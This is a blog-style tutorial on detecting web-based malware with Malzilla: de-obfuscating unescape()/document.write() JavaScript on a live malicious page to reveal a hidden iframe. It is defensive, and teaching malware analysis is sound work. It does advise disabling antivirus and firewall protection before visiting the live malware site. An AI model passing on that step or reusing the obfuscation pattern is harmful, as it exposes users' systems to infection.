Malzilla Documentation for Web Based Malware Detection
Buddies,
Before delving deeper into the malware detection stuffs let me just add some lines for defining what a Malware is all about. Malwares are some certain piece of codes which makes them executed without the user’s interference. Malwares are of various kinds which depends upon how they work and how they replicate themselves into the system for affecting the victim. 
But we won’t be discussing about their characteristics here as we will be focusing on some methodologies they follow to spread over the wired world.
Now this is the era of Internet and it takes a fraction of second to spread anything whether it may be any news or it may be any software or whatever!However ‘Malwares’ also uses the same convention to spread themselves as its fast and more effective. And now mostly the malware developers use various methods to spread their malicious codes through web pages as spreading malicious executables by embedding them into any genuine executables can’t be effective though the evil guy may use assorted bypassing techniques to make their codes undetectable from various Firewalls / Antivirus so that they can inject the vulnerable codes to the remote system without any obstacles.
So if the user witty enough then malware spreading can be prevented to some extent as sometimes its very hard to mitigate those. I will be discussing on how you can detect the malwares (through a live example) and how you can be prevented from those attacks. So let’s start!
We will be taking the help of the great tool Malzilla for the malware detection and how it spreads. I will be discussing on how to detect those as analysing those will be covered up later.
A short intro about the tool ‘Malzilla’
Malzilla is a tool bundled with lots of awesome features i.e. Some decoders for the encoded data used in various web pages, JavaScript De-obfuscator, HTTP Headers Info, Code Templates, Shellcode Analyser, Link Parser, Option to change User-Agent settings etc. There are some other useful features also but those are not part of our discussion right now.
For our analysis we have taken a live URL where a malware is running. And we will see how its obfuscated and how to get the details of the malware. But before starting your analysis download Malzilla and execute it. Now you will come across with the tool and we can see that we are in the Download tab now. Before making the request to that affected malware site we should disable our installed antivirus/firewall application else they will detect and block requests to that website. For our analysis we have the malware hosted website (Malware Location). Now in the URL tab if we put the URL and get the page info then within a second we will see the source of that page in the text field. Another feature of Malzilla is it shows the source of the webpage in a proper format so that it makes life easier to analyse the code. So now we have the page source code with us. But till now we are not sure whether the requested page contains any malicious malware or not.
As we know evil coders always obfuscate their source codes so that it can’t be detected easily. Thats why we have to de-obfuscate their codes so that we can know the way they are hosting the malicious contents. For that we have to choose the obfuscated pattern and have to decode those details to know whats happening under the hood. Now once we have the source of the page its the time to detect the obfuscated functions which are existing in the page. So once we choose “Send script to decoder” it detects the obfuscated code and highlights them and now we can know that Javascript is used here to obfuscate the code. After we are finished up with sending the code to the decoder, now our intention is to know the real culprit! Choose the Decoder tab now and you can see that the obfuscated to the clipboard and we can see “document.write()” attack pattern is being used here along with “unescape()”. So now if we run our script by clicking on “Run script” then we can come to know that ‘iframe’ tag is used here to embed the malware hosted URI here 
NOTE: Malzilla uses eval() to return the source URI and uses the Javascript libraries internally to decode the obfuscated codes so that the user will be able to know whats happening exactly without being affected from the malware.
Malzilla has the option to change the User-agent as well as referrer info, which is a nice advantage. It helps the user to debug more as the malwares are coded in such a way that they take advantage of various browser vulnerabilities by detecting the User-Agents from the HTTP header information and accordingly the malware tries to exploit the code into the remote system accordingly.
So overall we saw now how malware finds places to infect systems and how they use various obfuscation mechanisms to hide themselves. Malzilla can be a rescue point this time if you want to go deeper into the fact !!!
From the precaution point of view its always recommended to use various Anti-Virus applications and firewalls as well who just engages themselves to monitor your online activities and reports immediately if something bad goes on under the hood!!! Find the screenshot no. 4 to see how the AntiVirus blocked the request to that malicious site as it triggered a message as that page contains a malicious ‘iframe’ and contains obfuscated codes. That rejection of the request can be seen inside the Malzilla tool itself also.
At last I would like to say Malzilla is a fantastic tool for your malware explorations. The more you work on it the more you would love this tool!!!
I have attached some screenshots which may help you for your reference. I hope you find this information useful. Please feel free to contact if you have any further doubts or feedbacks. Feedbacks are always welcome.
